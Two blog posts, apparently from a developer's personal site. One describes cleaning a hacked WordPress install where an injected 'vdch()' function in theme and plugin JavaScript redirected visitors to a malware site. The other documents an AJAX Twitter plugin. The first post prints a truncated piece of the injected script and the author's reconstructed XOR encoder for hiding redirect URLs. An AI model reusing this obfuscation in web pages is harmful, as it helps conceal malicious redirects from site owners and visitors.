What the Hack?

Alex — Mon, 25 Jul 2011 17:49:22 +0000

I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.

Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).

Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.

Update: As I just read in this forum, on stackoverflow and on wordpress, they seem to compromise php and html files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.

This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.

function vdch() {
    if(document.all.length > 3) {
        var t = new Array(...);
        var dchid = "";
        for (j=0;j

Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).

var url = "http://your.url/";
var enc = new Array();
var rgb = "#";

for (i = 0, j = 2; i < url.length; i++, j += 2) {
    rgb += (url.charCodeAt(i)^j).toString(16);
    if (j == 6) {
        j = 0;
        enc.push(rgb);
        rgb = "#";
    }
}

AJAXed Twitter Plugin for WordPress

Alex — Thu, 28 Jan 2010 11:34:16 +0000

Ricardo González wrote a nice plugin for WordPress that displays the public timeline of a twitter account in your WordPress theme.

Though the plugin works I found two major problems:

Sometimes Twitter doesn’t provide the timeline at first request.
Embedding it in your theme significantly slows down loading of the blog.

I came up with a solution to both of them (featuring MooTools or jQuery support) using XMLHttpRequest.

Basically all it does is wait until the page is loaded and then request the tweets. If Twitter decides not to provide the timeline, the request is sent again until a configurable number of retries is reached.

There are two ways to use this plugin:

Configure it manually (see how-to below)
Use it as a widget (version two and above)

If you use it as widget, simply use the management functionality for widgets provided by WordPress. Otherwise (if your theme doesn’t support widgets for example) you can set also it up manually as I did on this blog (because I use MooTools here).

Plugin setup:

Provide a PHP-script (e.g. twitter.php in your theme folder), which can be loaded by the request:

if (!defined('DB_NAME')) {
	require_once("../../../wp-config.php");
}

echo AJAXedTwitter::messages(array(
	'username' => 'username'
));

You can see I modified the original plugin to use an array instead of parameters (I hate functions that require more than 3 parameters).

Parameters for AJAXedTwitter::messages are:

Option	Default	Description
username	empty	the twitter username
num	5	number of tweets to show (limited to 20 by Twitter)
list	true	show tweets in a unordered list
update	true	true show a relative timestamp
linked	#	options for hyperlinks (see original plugin docs)
hyperlinks	true	true convert URLs to links
twitter-users	true	show @username replies as links
encode-utf8	false	turn it on if you have encoding problems
cache-age	1800 (half an hour)	expiry of the cached feed (tweets) in seconds, `-1` to disable

JavaScript-Setup:

You have to tell the plugin which JS file to include (this should be done in wp_config.php):

define('AJAXED_TWITTER_FRAMEWORK', 'mootools');

In this example the plugin will enqueue the twitter class for MooTools. If you don’t want to use it, you can also define AJAXED_TWITTER_FRAMEWORK to false and include our own scripts. The default value is jquery. It’s also possible to include both scripts (using ‘both’).

Please note that using the provided Twitter-class you have to add MooTools to your theme’s header before wp_head();.

Then, below wp_head(); add a script tag where you configure the twitter part:

var twitter = new Twitter('myTweets', {
  url: '/twitter.php',
  retries: 2,
  animate: true
});

The above JS-code will automatically replace the element “myTweets” with your public timeline (or the error message if it runs out of retries) by loading the file twitter.php in your theme’s folder (see the PHP code?).

Possible options to the constructor are:

Option	Default	Description
url	null	the page to call, e.g. “/blog/wp-content/themes/derhofbauer/twitter.php”
retries	0	number of retries if first request fails
animate	false	if true, tweets will be faded in
autostart	true	if false, you will have to trigger the first request using `twitter.request.send();`

CSS classes:

Class	Description
twitter	the main list containing the tweets
twitter-item	list items (each tweet as li)
first	the first list item
last	the last list item
twitter-message	if not displaying as list and more than one tweets available, every tweet is put into a paragraph having this class
twitter-timestamp	spans containing the timestamp
twitter-link	every detected link in the tweets
twitter-user	linked @replies
twitter-error	displayed in case there was an error

Download:

AJAXed Twitter for WordPress 0.5